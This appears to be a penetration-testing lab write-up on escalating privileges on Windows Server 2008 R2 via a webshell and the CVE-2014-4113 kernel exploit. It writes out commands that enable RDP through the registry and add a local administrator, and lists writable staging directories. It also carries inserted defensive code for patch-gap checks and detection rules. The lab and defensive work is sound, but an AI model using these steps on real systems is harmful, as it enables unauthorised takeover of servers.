111. Network security penetration test - [privilege escalation 9] - [windows 2008 R2 kernel overflow privilege escalation]
2022-07-07 12:03:00 [qwsn]
In my view, whether you study security or work in it, you more or less develop a feeling for it and a sense of mission!!!
Table of contents
1. Windows kernel overflow privilege escalation [2008]
1. Background of kernel overflow privilege escalation:
On Windows Server 2008 R2 the server supports ASPX by default, so by default some commands can be executed. If the relevant patch is missing, a kernel overflow privilege-escalation tool can be used to escalate privileges.
2. CVE-2014-4113-Exploit
This version of the privilege-escalation tool can perform an overflow privilege escalation against Windows Server 2008.
3. Kernel overflow privilege-escalation process:
(1) Experimental environment:
1. Target environment:
(1) Virtual machine Windows 2008 [target_sys.com] [192.168.97.131]
(2) Scripting language environment: a php/asp language environment exists
2. Attacker:
(1) Virtual machine Win7 [192.168.97.130]
(2) Firefox + Burp Suite + AntSword + large webshell
3. Network environment:
(1) NAT network built with VMware
(2) Target link:
URL: http://target_sys.com/upload.php
(3) Experimental process:
Step one: Visit the target link, bypass the whitelist type restriction via the MIME type, and upload the up.aspx webshell.
[The above process is omitted.] The following is the privilege-escalation process:
Step two: Connect to the up.aspx webshell [password: admin], click the [CmdShell] module, and call cmd.exe to run the whoami command to view the current user; the privileges turn out to be low.
On Windows Server 2008 R2 the server supports ASPX by default, so by default some commands can be executed:
Step three: Click the [CmdShell] module, call cmd.exe to run the systeminfo command, copy the output, and then scan it for vulnerabilities with the wes.py script, but nothing came out.
Scan result: scan failed
Step four: Paste the systeminfo output into this website to look up the relevant privilege-escalation exploits; in the end CVE-2014-4113 was found to be usable. At the same time, in msfconsole type search kernel,
which also lists some exploits; enter each one and type info, and some of them turn out to be 2008 R2 privilege-escalation exploits. In the picture below, ms14-058 corresponds to CVE-2014-4113.
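Steps three and four boil down to reading the host's patch state out of systeminfo output and comparing it with the patches a given vulnerability requires. The following added example (not code from the original post, wes.py or Metasploit) does that from the defender's side: it parses an English-language systeminfo dump, collects the installed KB identifiers, and reports which of a caller-supplied list of required KBs are missing. The systeminfo text, the hotfix numbers in it and the `REQUIRED_KBS_EXAMPLE` list are constructed placeholders for illustration; the real KB number for MS14-058 should be taken from the vendor bulletin rather than from this code.

```python
import re

# Constructed sample: an abbreviated systeminfo dump in the English output format.
# The host name and hotfix numbers are illustrative, not captured from a real system.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WIN-EXAMPLE
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB976902
                           [03]: KB3000000
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""

# Placeholder list of KBs a policy might require on 2008 R2; these are NOT the
# real MS14-058 patch identifiers, look those up from the vendor bulletin.
REQUIRED_KBS_EXAMPLE = ["KB976902", "KB1111111"]

# Top-level "Key:   value" lines; the key is everything before the first colon.
_FIELD_RE = re.compile(r"^(?P<key>[^:]+?):\s*(?P<value>.*)$")
# Indented continuation items such as "[01]: KB2534111".
_ITEM_RE = re.compile(r"^\s+\[\d+\]:\s*(?P<item>.+?)\s*$")
_KB_RE = re.compile(r"KB\d+", re.IGNORECASE)


def parse_systeminfo(text):
    """Return (fields, hotfixes): the top-level key/value pairs and the set of KB ids."""
    fields = {}
    hotfixes = set()
    current = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line[0].isspace():
            # Continuation line: it belongs to the most recent top-level key.
            m = _ITEM_RE.match(line)
            if m and current == "Hotfix(s)":
                kb = _KB_RE.search(m.group("item"))
                if kb:
                    hotfixes.add(kb.group(0).upper())
            continue
        m = _FIELD_RE.match(line)
        if m:
            current = m.group("key").strip()
            fields[current] = m.group("value").strip()
    return fields, hotfixes


def is_2008_r2(fields):
    """True when the OS Name/Version fields identify Windows Server 2008 R2 (NT 6.1)."""
    return ("2008 R2" in fields.get("OS Name", "")
            and fields.get("OS Version", "").startswith("6.1."))


def missing_patches(installed_kbs, required_kbs):
    """Return the required KB ids (upper-cased, sorted) that are not installed."""
    have = {kb.upper() for kb in installed_kbs}
    return sorted(kb.upper() for kb in required_kbs if kb.upper() not in have)


if __name__ == "__main__":
    fields, kbs = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print("OS:", fields.get("OS Name"), "| 2008 R2:", is_2008_r2(fields))
    print("Installed hotfixes:", sorted(kbs))
    print("Missing from required list:", missing_patches(kbs, REQUIRED_KBS_EXAMPLE))
```

On a real host the same parser can be fed the output of `systeminfo` directly; the check is only as good as the required-KB list, which is why the exploit lookup in step four starts from an authoritative mapping of bulletin to KB.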
Step five: Click the [File Manager] module and upload rw.aspx, which is used to scan for readable and writable folders.
Step six: Visit the rw.aspx webshell just uploaded and scan for readable and writable folders.
As shown in the figure below, several readable and writable folders were found; after partial testing, the website root directory turned out to be usable.
Step seven: Go back to the webshell and upload the CVE-2014-4113-Exploit exp to c:\inetpub\wwwroot\target_sys.com.
Step eight: Click the [CmdShell] module and call cmd to run the CVE-2014-4113 exp just uploaded; as shown below, the overflow succeeds.
Step nine: Run the following commands in turn to open port 3389, add the user demo1 to the administrators group, and finally connect to the target remotely.
/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "netstat -ano"
# View port status
/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f"
# Turn on 3389
/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "netstat -ano"
# Verify that 3389 is on
/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "net user demo1 123 /add"
# Add user demo1 (password 123)
/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "net localgroup administrators demo1 /add"
# Add user demo1 to the administrators group
/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "net user"
# Verify that user demo1 exists
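Every action in steps two through nine leaves a process-creation record: an IIS worker (w3wp.exe) spawning cmd.exe, a binary under the web root running as SYSTEM after the overflow, the fDenyTSConnections registry write, and the net user / net localgroup commands. The following added example (not part of the original post) shows detection logic a defender would run over such records: per-event rules for each indicator, then a per-host correlation that flags the full chain when a web-shell indicator is followed within a time window by the privilege jump and an RDP-enable or admin-add action. The event records are constructed to mirror the commands above (field names modelled loosely on Windows event 4688 / Sysmon event 1); the host name, timestamps and the "fileserver" benign record are illustrative.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of process-creation records; not real logs. The first five
# mirror the commands in the post, the last is benign admin activity elsewhere.
SAMPLE_EVENTS = [
    {"ts": "2022-07-07T12:01:10", "host": "target_sys", "user": "IIS APPPOOL\\DefaultAppPool",
     "parent": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"ts": "2022-07-07T12:02:30", "host": "target_sys", "user": "IIS APPPOOL\\DefaultAppPool",
     "parent": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": 'cmd.exe /c c:\\inetpub\\wwwroot\\target_sys.com\\Win64.exe "netstat -ano"'},
    {"ts": "2022-07-07T12:03:05", "host": "target_sys", "user": "NT AUTHORITY\\SYSTEM",
     "parent": "c:\\inetpub\\wwwroot\\target_sys.com\\Win64.exe", "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": "REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server "
                "/v fDenyTSConnections /t REG_DWORD /d 00000000 /f"},
    {"ts": "2022-07-07T12:03:40", "host": "target_sys", "user": "NT AUTHORITY\\SYSTEM",
     "parent": "c:\\inetpub\\wwwroot\\target_sys.com\\Win64.exe", "image": "C:\\Windows\\System32\\net.exe",
     "cmdline": "net user demo1 123 /add"},
    {"ts": "2022-07-07T12:03:55", "host": "target_sys", "user": "NT AUTHORITY\\SYSTEM",
     "parent": "c:\\inetpub\\wwwroot\\target_sys.com\\Win64.exe", "image": "C:\\Windows\\System32\\net.exe",
     "cmdline": "net localgroup administrators demo1 /add"},
    {"ts": "2022-07-07T13:15:00", "host": "fileserver", "user": "CORP\\admin",
     "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c netstat -ano"},
]

WEBROOT = "\\inetpub\\wwwroot\\"

# Per-event rules: (name, predicate). Each one matches a single indicator.
RULES = [
    ("iis_worker_spawns_shell",
     lambda e: e["parent"].lower().endswith("\\w3wp.exe")
               and e["image"].lower().endswith(("\\cmd.exe", "\\powershell.exe"))),
    ("webroot_binary_runs_as_system",           # the privilege jump after the overflow
     lambda e: e["user"].upper().endswith("\\SYSTEM") and WEBROOT in e["parent"].lower()),
    ("rdp_enabled_via_registry",                # fDenyTSConnections set to 0
     lambda e: re.search(r"fdenytsconnections.*\s/d\s+0+(?:\s|$)", e["cmdline"], re.I) is not None),
    ("local_user_added",
     lambda e: re.search(r"\bnet1?(?:\.exe)?\s+user\s+\S+(?:\s+\S+)?\s+/add\b", e["cmdline"], re.I) is not None),
    ("added_to_administrators",
     lambda e: re.search(r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b",
                         e["cmdline"], re.I) is not None),
]


def match_rules(events):
    """Return one finding per (event, rule) pair whose predicate fires."""
    findings = []
    for e in events:
        for name, pred in RULES:
            if pred(e):
                findings.append({"host": e["host"], "ts": e["ts"], "rule": name, "cmdline": e["cmdline"]})
    return findings


def correlate(findings, window_minutes=30):
    """Per host, return the ordered rule names when a web-shell indicator, the privilege
    jump and an RDP-enable or admin-add action all occur within the window."""
    by_host = defaultdict(list)
    for f in findings:
        by_host[f["host"]].append(f)
    chains = {}
    for host, fs in by_host.items():
        fs.sort(key=lambda f: f["ts"])
        names = [f["rule"] for f in fs]
        span = datetime.fromisoformat(fs[-1]["ts"]) - datetime.fromisoformat(fs[0]["ts"])
        if ("iis_worker_spawns_shell" in names
                and "webroot_binary_runs_as_system" in names
                and {"rdp_enabled_via_registry", "added_to_administrators"} & set(names)
                and span <= timedelta(minutes=window_minutes)):
            chains[host] = names
    return chains


if __name__ == "__main__":
    found = match_rules(SAMPLE_EVENTS)
    for f in found:
        print(f["ts"], f["host"], f["rule"], "|", f["cmdline"])
    print("Chains:", correlate(found))
```

The individual rules are noisy on their own (administrators legitimately add users and enable RDP); the correlation is what turns them into a high-confidence alert, and the IIS-worker-spawns-shell rule is the earliest point at which the web-shell upload in step one can be caught.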
mstsc remote desktop connection:
Appendix: common readable/writable directories
≤2003 readable/writable directories
C:\RECYCLER\
D:\RECYCLER\
E:\RECYCLER\
C:\Windows\temp\
C:\Windows\Debug\
C:\Windows\Registration\CRMLog\
C:\Documents and Settings\All Users\Documents\
≥2008 readable/writable directories
C:\ProgramData\
C:\Windows\temp\
C:\Windows\Tasks\
C:\Windows\tracing\ // cannot be deleted
C:\Windows\debug\WIA\
C:\Windows\servicing\Sessions\
C:\Windows\servicing\Packages\
C:\Windows\Registration\CRMLog\
C:\Windows\System32\spool\drivers\color\
C:\Users\Default\AppData\ // cannot be deleted
C:\ProgramData\Microsoft\DeviceSync\
C:\ProgramData\Microsoft\Crypto\DSS\MachineKeys\
C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\
C:\ProgramData\Microsoft\User Account Pictures\ // cannot be deleted
C:\Users\All Users\Microsoft\NetFramework\BreadcrumbStore\ // cannot be deleted
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys\
C:\Windows\syswow64\tasks\microsoft\Windows\pla\system\
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Temporary ASP.NET Files\
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Temporary ASP.NET Files\
C:\Windows\System32\catroot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\
C:\Windows\System32\catroot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\